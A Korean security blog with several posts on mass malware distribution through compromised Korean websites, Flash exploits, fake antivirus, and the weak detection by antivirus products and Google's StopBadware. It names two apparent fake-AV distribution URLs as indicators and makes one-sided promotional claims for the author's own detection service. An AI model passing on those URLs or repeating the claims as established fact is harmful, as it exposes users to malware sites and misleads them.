태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

 - 2011.11.12
공격자의 전략적인 측면을 살펴 봐야 한다. 지금 개별 단위 보안제품의 대응은 사실상 무장해제 상태라고 봐야 하며 공격자들은 일단 규모로서 압도를 하고 탐지 로직을 우회함으로써 무력화 시키는 상황이다.

네트워크 단위의 보안제품의 한계, 패턴 매칭을 통해 탐지를 하는 AV든 Web Firewall 이든 개별적인 대응 밖에 되지 않고 있는 상황이고 전역적인 대응은 언감생심 꿈도 꾸지 못할 상황이다.

날마다 새로이 나오는 악성코드들을 진단 하기 위해서는 악성코드의 수집이 가장 먼저여야 된다. 그동안의 수집 방법을 보면 상당부분이 사용자의 신고, 허니넷, 허니팟 등을 통해서 이루어 지고 있다. 물론 정보의 공유는 시일이 지나서 각 업체들 끼리 이루어 짐으로 시의적절성 측면에서 늦을 수 밖에 없다. 이 각각에 대해 조금 이면을 살펴보자.

  • 만약 공격자가 공격을 수행 하지 않는다면 허니넷이나 허니팟은 무용지물이 된다.  
  • 또한 사용자가 악성이라고 인식을 하는 대부분의 경우도 설치된 AV에서의 탐지를 근거로 한다. 만약 AV가 탐지 하지 못하는 악성코드라면 사용자가 인지할 방안은 없다.

  • 업체간의 정보공유도 이전과 같은 전통적인 전달 매커니즘인 디스켓, USB를 통한 악성코드의 감염은 지역별 확산에 상당한 시간차가 걸렸고 바다를 건넌다는 것도 어려웠다. 이 매커니즘이 깨진건 웜이라는 매개체를 통해서이며 이 웜 조차도 발생지 근처의 네트웍이 먼저 초토화 된 이후 다른 곳으로 확산 된다.

    웜 이후에 발생된 것은 검색엔진을 통한 특화된 공격, 파일 공유등을 통한 확산이 있었고 일정한 특징을 가지고 있었다. 그렇다면 지금은 어떨까?

간단하게 설명하고 상당부분 축약해서 위의 과정을 언급했지만 각 과정마다 언급하지 않은 많은 상세한 부분들이 있다. 그 특징들에 대해서는 지금까지의 발표자료나 본 사이트의 글들을 참고하면 일정 수준 참고가 가능하다.

지금의 공격은 말하자면 불특정 다수를 겨냥한 무차별적인 악성코드 유포이며 주된 공격 대상은 사용자의 PC에 일반적으로 설치된 써드파티 프로그램을 공격하는 코드들이다.

왜 Adobe는 시도 때도 없이 패치를 하는가? 

그 이유는 현재 사용자 PC의 90% 가량에 Flash player가 설치 되어 있기 때문이고 해외도 비율상 조금 낮은 거 이외에는 별반 차이가 없다. 공격자들은 Flash Player의 취약성을 공격하여 사용자 PC의 권한 획득을 하는 것이 가장 효율적인 방안임을 인지하고 있기 때문에  집중적인 공격을 수행한다.

또한 개별 PC를 공격하는 것이 아니라 사용자들이 방문하는 웹서비스들을 집중하여 공략 함으로써 불특정 다수에 대한 공격을 성공적으로 하고 있다. 언론사뿐 아니라 주요 커뮤니티 서비스들, 파일공유 사이트들을 직접 공격하여 웹서비스의 소스를 변경한다. ( 운영자나 개발자가 눈치 채지 못하게 암호화 하거나 기묘한 곳에 아주 짧게 넣는 것은 기본이다.)


< 웹을 통한 악성 코드 유포와 활용에 대한 컨셉>

위의 이미지와 같이 다양하게 활용 되고 있다. 이중 90% 가량은 개인정보 유출 및 백도어 활용이 가능한 용도의 악성코드를 사용자에게 감염 시키고 5% 가량은 DDos 나 Arp spoofing 행위를 보인다. 나머지 5% 가량이 지난 농협 사례와 같이 내부망으로 공격하는 용도의 악성코드라 할 수 있다. 사실은 90%의 개인정보 유출도 동일하게 활용이 가능할 뿐이다. 사용처에 대해 구분을 하자면 이 정도라는 것일뿐.


2011년 11월 12일 현재의 상황


지난 몇년간을 위험성에 대해서 언급을 했었고 개인 차원에서 할 수 있는 최대한으로 발표와 기고, 컬럼을 통해 언급을 했었지만 아직도 우리는 한참을 더 가야 하고 현 상황을 돌아 보고 반성이 필요하지 않나 생각 된다.
물론 우리뿐 아니라 전 세계적으로 마찬가지지만  ..만약 우리가 대응을 잘한다면 미래에서의 인터넷의 주요 파워를 가지게 되지 않을까? 

단순한 예상으로도 보안 문제는 앞으로 더 심각해 지며 , 악성코드의 갯수는 점점 더 많아 질 것이다라고 예상 할 수 있다. 시만텍과 맥아피도 손을 놓는 상황에서 누가 살아 남을 수 있을 것인가? 핵심은 대량유포 매커니즘을 깨야만 하는 것이고 이 매커니즘을 깨기 위해서는 다각적인 노력이 필요하다. 이 노력은 악성코드 유포에 이용 되는 많은 웹 서비스들의 문제점을 개선하는 측면 하나와 대규모 확산 이전에 차단 하는 노력이 병행 되어야 가능 할 것이다.

모든 웹 서비스들의 문제점을 개선하여 공격자가 인위적으로 웹소스를 변경 하지 못하도록 취약성을 제거 한다면 이 문제는 매우 명백하게 해결 되나 이렇게 될 가능성은 앞으로도 인터넷이 존재하는한 불가능하다. 최소한 방문자가 많은 사이트들에게는 일정 수준의 강요가 되어야 하고 즉시적이고 긴급한 대응이 계속 되어야만 한다.

더불어 길목을 차단하는 것으로 수십여곳 이상의 웹서비스에서 악성코드의 경로가 추가되어 모든 방문자들에게 감염 시도를 하는 것을 예방 할 수 있다. 웹 소스에 추가된 경로를 빠르게 인지하여 대응을 한다면 이게 가능해진다.

경로의 빠른 인지는 아직도 원초적인 ( 이벤트 탐지 방식) 방식에만 의존하고 있는데 이걸 우회하고 무력화 하기 위한 공격자들의 전략도 이미 출현한 상태이고 이 부분은 별도의 글로 남기고자 한다.  
전략을 넘어서기 위해서는 좀 더 다른 방식의 접근이 필요하다.

탐지 체계에서도 다른 형태가 필요하며 대응체계 (주로 AV)도 변화가 필요한데 최소한 선제적인 대응이라도 못한다면 빠른 악성코드의 공유체계와 감시체계라고 존재해야만 효율을 높일 수 있다. 솔직히 한국을 대상으로 직접적으로 악성코드를 유포하고 있음에도 불구하고 한국내의 AV업체가 제대로 대응을 하지 못하는 것은 기회를 잃어 버리는 것과도 동일하다. 해외 보안분야 대기업들과 비교할 필요도 없다. 비교 우위를 가질 수 있는 고난의 시간을 그냥 보내는 것은 비극이다.


그럼 여기 금일자로 최소 50여곳 이상의 서비스들에 추가된 경유지를 살펴 보자. (하루 방문자 1만명만 해도 50만명이 감염 범위에 들어간다. 신규 악성코드라면 성공률은 거의 90%라고 봐야 하지 않을까? 최소한..)

A라는 서비스에 B라는 주소가 인위적으로 소스에 추가되어 있다. 우린 그 B를 추적하여 그 근거지를 보여주는 것이다. 일반적으로 사용자는 A라는 서비스에 브라우저로 연결만 하여도 B의 주소의 것도 같이 실행 되게 되어 감염 되는 것이다. 


두 곳을 올렸다. 한 곳은 국내의 커뮤니티 사이트에 직접 올린 내용이고 또 다른 하나는 공격자가 만든 근거지이다.
현재 이 데이터를 확인 하는 것은 이미 발견 시간이 몇 시간좀 지나긴 했지만 아직도 전 세계에서 두번째가 아닐까 싶다.

만들어둔 공격자 다음으로 말이다.

* 최소 50여곳 이상의 웹서비스에서 악성코드를 사용자에게 배포하고 있슴에도 불구하고 구글의 Block 로직은 전혀 동작하지 않는다. Stopbadware의 데이터는 이전 기록을 가지고 대응하는 것일 뿐이지 지금의 문제는 아닌 것이다. 또한 판단근거가 부족하기에 탐지는 어렵다고 봐야 된다.  구글의 서비스 확장전략에 보안도 들어가 있지만 그것은 필히 실패할 것이다. 지난 6년간 수많은 비용을 들여 축적한 데이터의 신뢰도는 낮다. 그걸 입증하는 것도 어렵지 않다.  앞으로는 규모로 한번 해볼 예정이다. 

그렇다면 이중에서 신규 플래쉬 공격코드로 유포되는 악성코드의 탐지는 어느 정도 되는지 확인해 보자.



단순히 보면 알겠지만 전 세계 주요 백신들 중에서 오직 하나 정도만이 휴리스틱으로 ( 악의성이 있다 정도? ) 탐지가 된다. 나머지는 전멸이다. 여기 백신에는 이름만 들어도 알 수 있는 모든 제품들이 포함 되어 있다.

즉 제대로 진단되는 백신은 하나도 없다는 의미와 동일하다.
( 시만텍이든 맥아피든 마찬가지다...)

서비스를 통한 차단을 하는 구글의 Stopbadware도 차단이 되지 않고 가장 악성코드를 많이 분석하는 회사들이나 모든 백신 회사들의 탐지에도 걸리지 않는다. 이게 지금 우리가 마주한 실질적인 위협이다.


지난 3주 이상을 샘플을 일부 분석해 보고 테스트 해봤지만 평균 탐지율은 10% 미만이다. 우리의 지금 상태가 그렇다. 오늘도 파일공유나 언론사, 커뮤니티 사이트에 대량 추가가 되어 있어서 한국내에서만 이 악성코드의 확산은 100만대를 상회할 것이라 예상된다. Adobe의 패치? 기대를 말자!.

우리를 보호하고 지킬 수 있는 것은 우리 자신 밖에 없다. 아무리 불법적인 사이트를 안가고 패치를 잘하고 보안제품을 쓴다고 해도 이젠 위험에 노출된 상황이다. 인터넷 서핑을 하지 말아야만 위험이 줄어 드는데 그럴 수 있는가? 

다른 형태의 위협대응이 긴급하게 요구되고 즉시 대응이 되어야만 한다.


- 바다란 세상 가장 낮은 곳의 또 다른 이름

* 현재 여기에 올린 이미지의 내용을 인지하고 있는 곳도 없고 악성 공격코드의 최초 확보도 현재로서는 우리쪽에서만 가능하다. 좀 더 조용하고 은밀하게 해야 하지만 이 문제의 심각성에 대해서 인식이 부족하여 노출을 감내하면서도 자료를 일부 오픈 할 수 밖에 없다. 그러나 충분한 인식이 되었다면 우리도 정보 노출을 최대한 하지 않을 생각이다. 


*개인적으로 지난 15년간 ( 벌써 ..후.) 많은 공개문서들과 컬럼, 의견들을 올렸는데 한번쯤 정리를 할 필요성을 느낀다. 여전히 새롭게 이 분야에 들어온 많은 분들이 모르는 것들이 많다. 먼지 쌓인 외장 하드의 전원을 한번쯤 올려야 겠다. History of p4ssion 정도
 
Posted by 바다란
* 9.14일의 점검 결과로 추가 보강 하였습니다. 9.10일 3개 사이트 5개의 링크에서 국내만 현재 19800여개의 페이지로 확산 되어 있습니다. 자동화된 공격이 얼마나 일반적인지 확인 하시기 바랍니다. 더불어 구글의 검색 수집과 정렬의 시간차가 있고 공격자들은 이미 이 패턴을 가볍게 벗어난다는 것이죠. 9.14 현재에도 새로운 fake av 유포 URL이 발견 되었습니다.  
fake av를 설치하는 링크가 추가된 사이트들 모두 DB의 데이터는 모두 유출 되었다고 봐야 됩니다. 이제는 그 가치도 없어서 다만 fake av를 설치하는 껍데기로 전락한 사례가 되겠죠.  근본 문제 수정 없이는 계속될 이야기 입니다.

------------------------------------------------------------------------------

이틀전 올린 허위백신 설치 통로인  bookmonn.com/ur.php가 구글 검색에 반영되기도 전에 어제( 2011 9,9)부로 새로운 경로로 변경이 되고 있다. 현재 모니터링 대상에서만 70여곳 (국내사이트 ) 이상인데 불구하고 구글 검색에는 10개 정도 나온다. ~ 

구글 검색 믿지 마시라.~ 그냥 자료 찾는 정도로만 활용하자. 구글의 세이프 브라우저도 마찬가지이다. 크롬이나  파이어팍스 사용중에 붉은색으로 화면 전환 되는 것들 몇 번 경험들 하셨을텐데.. 그 실체가 구글의 데이터 기반 ( stopbadware.org 참고) 이다. 과연 믿을만 한 것인가에 대한 의심은 누구도  하지 않았을 것이다. 또 실제로 구글 같은 규모의 회사와 서비스에 검증할 만한 용기를 가질 곳도 없을 것이다. 전 세계  누구라도..


데이터와 증명이 가능한 수치만 있다면 동일 모집단 대상으로 하였을 경우에도 충분한 설득력을 가질수 있다.
이미 데이터는 누적이 되어 있고.. 잠시 여유 있다면 더 진행 할 예정이나 단순히 눈에 보이는 몇 가지 만으로도 부분적인 확인들은 가능하다.

과연 실제 위험은 무엇인가? 하는 질문도 가져야 할 것이고 빙산의 일각은 정말 운이 좋아야 걸리는 정도라고 해야 될까?  
 
검색을 통해 나오는 공격의 흔적은 이미 검색에 나오는 이상으로 대규모 확산되어 있는 것이 기본이다. 성공한 공격은 통계에 나오지도 않는다.  일부 실패한 것들만 어쩌다 걸릴뿐인거다. 검색어 기반의 패턴을 이용한 매칭은 초기 자료의 정렬에도 많은 시간이 소요 될 수 밖에 없다. 그리고 패턴매핑에 걸려드는 데이터들도 시일이 지나야만 정리가 될 것이고 의미 있는 자료가 될 수 있다. 이때는 이미 공격은 한차례 지나가고 또 다른 변화를 가진 다음일 것이다.

 
이틀전 9.7일에 발견된 bookmonn.com/ur.php 를 이용한 허위백신 경로가 대폭 변경이 되고 있다.
bookgusa.com/ur.php 로 변경 되었다.  그리고 이 데이터는 지금 이순간 전 세계 어느 누구도 모른다. 오직 공격자와 우리만 알고 있을 뿐이다. 그 결과를 살펴보자.

이미지 상으로 보면 중복제외하고 국내는 세곳이 나온다. 그리고 전세계를 통털어도 10곳 미만이 나온다. (중복제외).. 그러나 빛스캔의 대규모 유포 탐지에는 이미 70곳 이상의 웹서비스에서 유포가 되고 있다. 

성공한 공격은 나타나지 않으며 무작위로 대입하다 실패한 것들만 일부 드러나는 현실이라는 점을 인식해야 한다. 또 fake av 설치로 유도하는 경우는 대부분 다운로드 없이 이슈가 발생하고 있어서 탐지나 대응은 아주 한참 뒤에나 가능해 진다.  대체 사전 대응. 즉 선제적 대응이라는 말은 이 분야에서 가당키나 한 것일까?

체계를 위협하는 진짜 위험한 것들은 검색 정도에 걸리지 않는다. 대놓고 공격하는 조무래기들 조차도 제대로 찾지 못하는 마당에 무얼 할 수 있을까?

 
구글 보다 나은게 뭐냐는 질문이 있어서 .. 신속, 정확, 현실적 위험도를 보는 관점이 다름을 알려 드리기 위해 잠시 소개한다.





또 하나의 그림을 보도록 하자. 9.10일자로 감지된 빛스캔 탐지 체계의 일부 화면은 다음과 같다.
큰 차이를 보이고 있음을 알 수 있다.  웹소스를 분석하는 구글조차도 결과가 형편 없을진대 다른 보안업체들은 말해 무엇하랴.. ( 국내는 비교할 필요 없이 전 세계 주요 기업들 모두 마찬가지이다. ) 현재 거의 할 수 있는 일이 없을 것이다.  한참 지난 후 침해사고 분석이나 여러 자료를 통해서 확인을 할 뿐이고...



  좀 더 재밌는건 현재도 유일하게 잡아내는 체계이지만 곧 탐지이후 분석 단계까지 자동화 단계로 돌입 된다는 점이다. 공격하는 자들과 경쟁이 될 수 있을것 같다. 전 세계를 무대로... 

다른 기업들과 경쟁 하는 것은 관심이 없다. 공격하는자들, 조롱하는 자들과의 승부가 가능한가에는 관심이 있다. 또 그것이 궁극적으로 최선의 길에 이르게 할 것임을 이미 잘 알고 있다. 그 길에 열정을 다할 뿐인것이다.

* 추가 확인을 위해 9.14일 오후에 확인된 구글 검색 결과를 올려 드립니다.
현재 국내 도메인만 19,800 여개의 페이지에 걸려 있음을 확인 할 수 있습니다. 불과 4일전만 해도 3개 사이트 5개의 페이지만 나오던것에서 말이죠. 현재 공격의 심각성을 분명히 인지해야 할 것입니다.


- 바다란 


Posted by 바다란

구글이 2006년 부터 해온  stopbadware를 활용한 붉은색 경고 마크 정책을 변경 한단다. 정확하게는 변경이 아니라 다른 부가적인 서비스를 붙이는 것이지만..

왜 이럴까?. 악성코드 유포지로 확인된 사이트들에 대해 Alert 하는 정책으로는 지금과 같은 악성코드의 홍수를 막을 수 없기 때문이겠지. 당연히..

현재 Malware link를 찾거나 대응 할 수 있는 서비스는 여러개가 있지만 그중 가장 파워풀 한 것이 구글의 정책이다. ms와의 브라우저 전쟁이나 OS 전쟁에서도 이길 수 있는 ( 여긴 애플은 아직 애송이일 뿐) 방책이기도 하다. 그러나 DB 갱신이나 정보 확인 에는 시간이 걸린다. 아무리 빨라야 3일 정도.. 근데 3일이면 공격하는 자들은 또 바꾼다. 취약한 웹 서버는 어디에나 있기에..

2~3일에 한번씩 바뀌는 공격자들이 악성코드를 업로드 하거나 업로드된 경로로 유도하는 링크를 수도 없이 만들어 내고 이것을 취약한 웹 서비스들에 추가한다. 끝도 없이.

상상하기 힘든 위협이라고 몇 년전부터 이야기 해왔다. 이제 그 한계에 도달하고 있다.
전체 보안인력들이 대응 하기 힘든 한계에 도달하고 있으며 이 한계는 그들의 극한을 시험 할 것이다.

가장 많은 데이터를 가지고 있는 구글조차도 해결 하지 못하는 난제를 위해 그들은 자신들의 호스팅을 받을 것을 권한다. 구글의 관리자 도구를 활용하면 운영자가 추가하지 않은 링크들이 웹 서비스에 추가 될때 Alert을 해준다는 것이다. 문제는 다양하다. 매번 소스코드 변경이나 추가 혹은 링크를 통제 할때 마다 구글의 시험을 통과 해야 한다. 

또한 그 통과의 간극은 계속 지속 될 수 밖에 없다. 그리고 구글 관리자 도구를 계속 써야 하는 이유도 그렇고..
이게 과연 해결책이 될 수 있을까?  구글은 인터넷 전체를 통제 한다 하여도 불가능한 꿈을 꾸고 있다.

2~3일에 한번씩 발생 하는 Alert과 장기적으로는 차단으로 이어지는 상황이 된다면 이건 정상적인 인터넷을 향한 길이 아니다. 문제는 왜 그렇게 발생이 되고 재발이 되는지에 대한 근본적인 개선 노력이 병행 되어야만 가능하다.

아직 구글도 단순히 오프라인 상에서의 부분적인 점검만 가능한 도구를 오픈 했을뿐 다른 노력은 어디에도 없다.

그들이 못한 걸 다 가지고 있다. 3일의 간극을 넘을 수 있는 도구도.. 근본 문제를 해결 할 수 있는 도구와 서비스도 다 가지고 있다. 아직은 하룻강아지일 뿐이지만 ^^

이 것을 제어 하는자가 다음 전쟁의 주도권을 쥔다. 
일단 칼은 내 손안에 있다. 하하핫.
Posted by 바다란

 

외신 관련 기사 ( Google Adsense 관련된 웜 이슈)

http://news.zdnet.co.uk/security/0,1000000189,39291643,00.htm

 

http://www.bigmouthmedia.com/live/articles/googles-adsense-threatened-by-trojan.asp/4321/

 

전자신문 기사.

http://www.etnews.co.kr/news/detail.html?id=200712210129

 

바다란 입니다..

 

오랜만에 뵙습니다.

지난번 마지막 글 (http://blog.naver.com/p4ssion/50024269739 )에서 IT 서비스 보호를 위한 제안 방안에서 서비스 보호를 위해서는 전역적인 대응체제 구성이 필요하다는 의견을 드렸습니다. 그 필요성이 가장 필요한 케이스가 구글에 나타났습니다. 이른바 Service Hijacking 이라고 할 수 있겠네요.

 

개인 PC에 상존하는 웜들이 자체 전파를 하면서 Adsense를 바꿔치기하고 광고수익을 가로채는 유형인데 위의 기사에 언급 되었듯이 구글의 지대한 매출액과 순이익의 비밀에 40% 가량 기여를 하고 있는 Adsense 부분이 유명무실화될 위기에 처했다고 볼 수 있습니다. 최근에 보안업체에 의해 발견이 된 악성코드 이며 시작은 언제인지 파악하기 어렵습니다. ( 그 이야기는 그동안의 피해산정도 어렵다는 의미이며 통계화 하기도 불가능하다는 이야기와 동일합니다.)

 

IT 서비스 기업에서 가장 중요한 부분은 신뢰성입니다. A B간의 관계에 신뢰성이 존재하여야 거래가 이루어 지는데 이 신뢰 자체가 깨어지게 된 것이죠. 기업과 서비스 간에 있어서 그 동안의 보호의 개념이 자사의 서비스에 대한 보호 관점에서 사용자의 PC에 대한 보호 관점으로 옮겨 갈 수 밖에 없다고 하였고 국내는 이미 2005년 말 게임 부분에 대해 게임에 대한 악성코드를 제거하는 전용백신 및 다양한 온라인 보안 서비스들이 부가 되면서 시작 되었으나 해외 부분은 전혀 그렇지 못했습니다.

 

위의 이미지는 올해 9월의 Item 거래 업체에 대한 DDos 공격 이후에 개념도를 확장한 내용입니다. 개별 서비스 단위까지 영향을 미칠 수 있고 조금만 더 생각을 해보면 구글과 같은 모델에 대해서는 손쉽게 공격이 가능합니다. 국내를 공격한 조직 정도의 기술레벨이라면 충분히 더 큰 규모를 노릴 수도 있는 것이 정답입니다.

최종 단계에서 보듯이 사용자에게 유포된 악성코드를 이용하여 국내에서는 DDos  공격에 이용하였지만 이 내용만 Adsense의 내용으로 바꾸면 될 문제입니다. 그리 어렵지 않게 전환이 가능합니다.

 

 

IT 서비스 부분에 있어서 Security 관련된 위협이 회사의 명운을 걸 정도로 치명적이다라는 것을 인지 못했다고 보는 것이 정확할 것입니다. 나름대로 보안 부서를 정리하고 신규로 만들면서 다양한 서비스 부분에 대해서 구글은 노력했으나 이제는 전방위적인 노력을 해야 할 것 같습니다. 그렇지 않다면 구글의 서비스 모델 자체가 무너질 수도 있는 위기라고 할 수 있을 것 같습니다.

 

아래의 이미지는 공격자들의 기술 발전 좌표입니다. 최근에 제가 갱신한 내용입니다. 이제는 웹을 통한 자동화된 유포 단계에 까지 이어져 있습니다. 아직 구글의 사례가 어떤 케이스인지 정확한 분석은 안되었으나 기사에 나온 현황들로만 유추해 볼때 아직까지 최종 단계까지는 인식을 못하는 것으로 보입니다.

 

 

최근의 동향은 공격자들의 기술수준도 매우 높아졌습니다. 자동화된 도구에 특정 서비스에 특화된 공격들도 함께 붙여진 상태이며 위험 수위가 높다고 할 수 있습니다.

 

앞으로의 구글의 대응은 어떻게 될까요?.

예상하자면.. ( 구글이 살기 위해서라면 )  온라인 보안 서비스(Adsense를 위협하는 악성코드의 제거) 도입 또는 무료백신 서비스의 전세계적인 확장 이외에는 대안이 없을 것입니다.  구글팩에 이미 백신이 포함 되어 있지만 이것은 사용자의 편의를 위한 것이고 이제는 서비스의 생존을 위해서 필요한 부분입니다.

 

이미 발전 방향으로 보았을때 지난해 부터 예견이 된 문제이고 이제서야 나타난 것 뿐입니다.

 

IT 서비스는 불완전 합니다. 다만 완전에 가까울 수 있도록 지속적인 노력을 꾸준하게 하여야만 합니다.

이것을 하기 위해서는 현상에 대한 지속적인 관찰과 예상을 통해 작은 단서를 통해 향후 나타날 수 있는 Risk를 예상 할 수 있어야 하고 조기에 준비를 하여야만 합니다. 그렇지 않으면 세계적인 서비스는 위험에 처할 수 밖에 없습니다.

 

전 세계적으로 기술적인 보안과 Provisioning이 중요시 되고 방향성이 제시 되지 않는 IT 서비스 기업의 생존은 앞으로 험난할 것입니다.

 

 

이미 예견된 문제입니다. 벌써 예견이 된 문제..

 이제는 국내의 무료백신 경쟁과는 관계없이 세계적인 모델이 먼저 나올 것 같군요.

 

 

보안업체의 생존은 고민들 많이 하시겠지만 서비스별로 특화된 방안을 가져 가야만 할 것입니다. 특화하기 위해서는 정보 수집과 연구에 많은 노력이 있어야 되겠지요.  그동안 새로운 접근에 대한 사고와 노력이 부족하여 앞으로 상당기간 어려움이 있을 것 같습니다. 국내업체뿐 아니라 전 세계 보안업체 모두 새로운 위협에 대한 대응은 여전히 인지단계라고 볼 수 밖에 없을 것 같습니다.

 

 좋은 연말연시 되십시요.

 

* 앞으로 언제까지가 될지 모르겠으나 블로그에 많은 포스팅을 하게 될 것 같습니다. 생각 나는대로 올릴 수 있도록 하겠습니다.

 

 

Posted by 바다란

안녕하세요. 바다란입니다.

 

금일 자 기사에 Vista의 전문가들의 비난에 대해 침묵하던 빌게이츠 회장의 의견 피력이 있었습니다. 전체적으로 보면 일상적이고 무난한 의견이라고 보지만 그 동안 시대 상황이 변화고 환경 자체가 변함에 따라 변화의 요구는 매우 강해 질 수 밖에 없었던 MS의 입장을 볼 수 있습니다. 그 입장 변화의 주요 핵심요소들 중에는 Security가 있습니다.

 

그 동안 운영체제의 문제로 인해 발생된 문제들에 대한 지대한 관심과 IT분야에서의 이슈메이커는 MS에 집중이 되었습니다. 어찌 보면 당연한 문제일 수 밖에 없습니다. 신규 웜의 발생 및 파급효과 면에서 가장 큰 효과를 지닌 MS의 운영체제는 집중적인 분석 및 공격 대상이 되어 왔었고 현재도 마찬가지 입니다.  따라서 운영체제에 대한 보호 방안 마련 및 Secure한 운영체제 구현은 근 5년 이상 2000년대 들어서 MS에게 주어진 숙제와도 같았을 것입니다. 1차 숙제를 끝냈다고 생각한 빌 게이츠의 의견은 기사와 같습니다.

 

빌 게이츠 "비스타 비난 근거 없다"

http://news.naver.com/news/read.php?mode=LSS2D&office_id=030&article_id=0000168184&section_id=105&section_id2=230&menu_id=105

 

"비스타의 가장 큰 장점 중 하나는 많은 신기술과 보안 기능으로 사용자를 즉각 흡수한다는 것"

 

비스타에 대해 의견을 내는 빌의 한 마디는 위와 같이 요약이 됩니다. 기술된 언어에서 중요 포인트를 추려보면 강조표시를 한 신기술과 보안기능입니다. 신기술의 측면은 UI 측면과 그다지 새롭지 않은 기술들 [ 이미 틈새를 개발한 많은 개발 업체들이 상용화 한 부분]의 운영체제 흡수를 들 수 있습니다. 새로운 기능들이 얼마나 포함이 되었는지는 상세하게 알지 못하지만 언론지상에 노출된 기능만을 보았을 때는 UI 측면 그리고 인터넷에 접근 한 이후에 사용할 수 있는 선택의 기제를 운영체제에 내포한 기능 정도로 볼 수 있습니다. IE7 Vista를 관통하는 정의는 선택의 흡수와 편리성 입니다.

 

선택의 흡수란 말은 인터넷 연결 이후에 선택하는 사이트에서 이루어지는 행위 자체를 운영체제 단위 및 기본 Application 에 내재화 시킨 것으로 볼 수 있습니다. 향후 다양한 기능들이 추가가 될 것으로 예상이 됩니다. MS의 주요 경쟁자가 구글 , 야후 등과 같은 Service content를 제공하는 업체라고 인식을 하고 있고 인식의 바탕 하에 service content의 제공자 역할까지도 동시에 하겠다는 말과도 일맥상통 하다고 볼 수 있습니다. 편리성이라는 용어도 선택의 흡수와 연계되는 용어 입니다. 단지 포장만 달리 했다고 볼 수 있습니다. 경쟁자를 이기기 위해 들고나온 첫 무기가 Vista라고 볼 수 있을 것 같습니다. 또한 경쟁자의 대상을 명확하게 했다고 볼 수도 있습니다.

전략적으로는 서비스 제공자의 역할을 분산시키고 선택 제한을 통해 약화를 시키고 세부적으로는 MS의 솔루션에 대한 Security 인식을 심어주기 위한 의도라고 볼 수 있습니다. 다르게 보면 All in one OS를 지향 한다고도 볼 수 있을 것 같습니다. 지금까지는 개별 Application 설치를 통해서 해결 하던 문제를 알게 모르게 흡수를 하여 상당부분 운영체제 혹은 MS Lineup에서 해결 할 수 있도록 하여 시장에 대한 지배력의 공고화를 노리고 있다고 봅니다. 노벨에 대한 회유도 대동소이한  맥락이라 볼 수 있을 것입니다.

 

다양한 신기술을 접속이라는 측면에는 위와 같은 배경들이 존재한다고 할 수 있으며 그 결과가 개별 Application의 흡수라고 볼 수 있습니다. 심지어는 보안 관련된 Application도 자사의 서비스 전략에 포함을 시켜 두고 전 세계에서 서비스를 하고 있습니다. (Live oncare) MS와 관련이 없을 것으로 여겼던 [ 자사의 서비스 취약성을 이용하는 공격을 Active하게 대응 한다고도 볼 수 있습니다.] 부분까지도 범위를 확장한 것은 그만큼 서비스 범위에 대한 통제권을 확실히 하고 이득을 분명하게 추구하겠다는 이야기라고 볼 수 있습니다.

 

또 다른 부분으로 언급한 보안성이라는 측면에서 공식적으로 보안이 강화되었고 보안성이 사용자를 흡수 할 수 있다는 논의는 그 동안 MS에서 들인 노력에 대한 자신감이라 할 수 있습니다. 그 노력에 대한 자신감은 모든 개발인력에 대한 보안프로세스 이해 그리고 실제적인 보안의 사안을 이해하기 위해 보안 자격증 취득 지원 ( CISSP ? ) 그리고 강력하고 반복적인 BlackBox Test를 통한 자신감이라 하겠습니다. 지난 시간 동안 개발에 투입된 비용만큼을 보안에 투입한 상황에서는 충분히 가질 수 있다 하겠습니다. SDLC (Secure Software Development Life Cycle or Security Development Life Cycle)를 언급한 MS의 입장에서도 확인 할 수 있습니다.

Ref: SDLC  [ Secure Software 개발을 위한 반복적인 Penetration Test 그리고 문제해결 과정을 의미 하기도 합니다.]

< www.owasp.org Eoin.keary@owasp.org 의 발표자료중 발췌>

 

2002년 초에 MS에서 공식적으로 표방한 TCI (Trustworthy Computing Initiative) 전략의 첫 완성물이라고 볼 수 있기에 Vista에 대한 자신감은 있을 수 있습니다. 2002년 이후 일정 수준이상 완성된 Vista 의 소스코드를 전체에 대해서 전수 검사를 수행하고 문제 있는 부분 수정을 한 이후 출시 일정을 미루어 가면서 까지 나온 바탕이 배경화 되었을 것입니다. 그 동안에 들인 비용은 상상을 초월하는 비용이 들었을 것입니다. 어쩌면 Vista에 대한 개발 비용 보다 더 많은 비용이 들었을 것입니다.  이런 일련의 흐름이 지향하는 바는 명확합니다. 기업은 이익 창출이 기본 개념입니다. 그리고 이익이 없는 곳에는 행동 하지 않습니다. 따라서 MS의 보안분야에 대한 투자는 운영체제에 대한 막대한 시장지배력만으로 유지하는 것은 어렵다는 것을 인지하고 Security 라는 부분이 중대한 Factor임을 인정한 것 이라 볼 수 있습니다.

 

관련기사: http://news.naver.com/news/read.php?mode=LSD&office_id=092&article_id=0000006973&section_id=105&menu_id=105

 

그러나 과연 Vista에 대한 보안적인 이슈들을 일정부분 해소 하였다고 하여 보안성이 강화 되었다고 할 수 있을까요?

질문 나갑니다. Vista는 안전 합니다. 그럼 Vista 상에서 동작하는 모든 Application들도 안전 할까요?

 

정답은 그렇지 않다 입니다. Application에 대한 공격은 2004년부터 일반화된 경향이며 현재 발표되는 취약성의 90% 이상이 개별 Application에 대한 내용입니다. 그 중에는 MS에 많은 이득을 창출케 해주었던 MS Office 군도 포함이 되어 있습니다. 이전의 Office 제품과 호환이 가능하면서 완전한 Security Process를 수립하고 process에 따른 대책이 이루어 졌을까요? 그렇지 않다고 단언합니다.

Office 제품군에 대한 취약성은 일주일에 몇 개 꼴로 신규 취약성 및 공격 가능성이 발견 되고 있습니다. 지금은 일반화된 zeroday attack[패치가 없는 취약성] 이 가능한 공격코드들이 무수히 발견 되고 있고 일정 수준 이상의 Binary 분석 및 취약점 발견 능력을 지닌 사람들에게는  손쉬운 일이라 할 수 있습니다. 도구의 발전으로 인해 예전보다 휠씬 더 적은 시간을 투자하고도 발견 할 수 있다고 봅니다.

 

http://www.securityfocus.com/bid 에서 Vendor Microsoft로 선택 하시고 보시면 최근 MS제품군에서 발견된 취약성을 확인 할 수 있습니다. 2007년에 발견된 다수의 취약성 대부분이 Office 제품군에서 발견된 것을 확인 할 수 있습니다. 물론 알려진 것 만입니다. 알려지지 않은 취약성이 더욱 많겠죠.

 

<securityfocus의 MS 관련 취약성>

 

https://www.youtube.com/watch?v=x1OF1BH0HhM

< MS Word Zeroday Attack에 대한 Youtube 동영상>

 

